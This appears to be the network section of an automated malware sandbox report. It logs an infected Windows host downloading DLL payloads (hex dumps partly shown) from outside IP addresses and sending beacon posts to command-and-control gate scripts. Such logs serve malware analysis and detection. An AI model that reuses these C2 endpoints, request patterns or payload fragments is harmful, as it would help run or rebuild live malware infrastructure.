                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:55.274522066 CET95OUTGET /68b591d6548ec281/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:55.712528944 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:55 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 257872
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:56.502244949 CET99OUTGET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:56.940278053 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:56 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                        ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 80880
                                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        65192.168.2.1050085185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:40.104247093 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:40.224291086 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:41.777729988 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:40 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        66192.168.2.1050089185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:41.873130083 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:42.963052034 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:42 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        67192.168.2.1050091185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:42.003072023 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:42.123905897 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:43.486613989 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:42 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        68192.168.2.105009734.107.221.8280
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:42.946506977 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.041645050 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 10:09:25 GMT
                                                                                                                                                                                                                                                                                        Age: 20418
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.305969000 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.621232033 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 10:09:25 GMT
                                                                                                                                                                                                                                                                                        Age: 20419
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        69192.168.2.1050104185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:43.766709089 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:43.896528959 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:45.388396025 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:44 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        70192.168.2.105011034.107.221.8280
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.367058039 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        71192.168.2.105011734.107.221.8280
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.792177916 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:45.879311085 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 10:08:28 GMT
                                                                                                                                                                                                                                                                                        Age: 20477
                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                        Data Ascii: success
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:45.986778975 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:46.301806927 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 10:08:28 GMT
                                                                                                                                                                                                                                                                                        Age: 20478
                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                        Data Ascii: success
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:56.410509109 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        72192.168.2.1050116185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.793207884 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:46.092911959 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:45 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        73192.168.2.105011834.107.221.8280
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:44.886209011 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:45.972094059 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 90
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Wed, 11 Dec 2024 18:55:58 GMT
                                                                                                                                                                                                                                                                                        Age: 75227
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:56.097886086 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        74192.168.2.105011980.82.65.70805584C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:45.575855970 CET392OUTGET /soft/download HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                                                        User-Agent: d
                                                                                                                                                                                                                                                                                        Host: 80.82.65.70
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.060123920 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:46 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="dll";
                                                                                                                                                                                                                                                                                        Content-Length: 242176
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.060163975 CET1236INData Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32
                                                                                                                                                                                                                                                                                        Data Ascii: (v*{#{#owox(+oy*{,{ oo+{!oo(2*z,{",{"o/(z*((X[((X[((X[(q*~(-(-(***~to(3to*^(
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:47.060178041 CET1236INData Raw: 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 04 03 6f 6f 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 32 02 7b 63 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 63 00 00 04 03
                                                                                                                                                                                                                                                                                        Data Ascii: *{R*2{co*R}U{coo*{Q*"}Q*2{cow*~{coy}]so*2{cos*N{cop(*2{dos*N{dop(*{V*R}Vs(*{W*R}Ws(*F{cot
